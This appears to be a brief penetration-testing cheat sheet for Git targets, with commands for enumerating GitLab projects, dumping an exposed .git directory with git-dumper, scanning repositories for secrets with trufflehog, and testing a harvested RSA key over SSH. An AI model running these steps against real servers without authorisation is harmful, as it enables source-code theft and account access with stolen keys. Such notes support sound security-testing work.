GIT

GITLAB Projects

List gitlab projects

curl -s http://gitlabserver/explore/projects | grep 'class="project" href'
<a class="project" href="/global/secretproject1"> [...]

Exposed .git

You found a .git on a website and you want to retrieve data from it

pipx install git+https://github.com/arthaud/git-dumper
mkdir /tmp/website
git-dumper http://website/.git /tmp/website

Scan Project

Search for sensitive informations such as RSA keys

trufflehog http://gitlabserver/global/secretproject1

Test RSA

You can try an RSA key on git server, it will return associated user

ssh -T git@gitlabserver -i /tmp/git_id_rsa
Welcome to GitLab, @userlambda!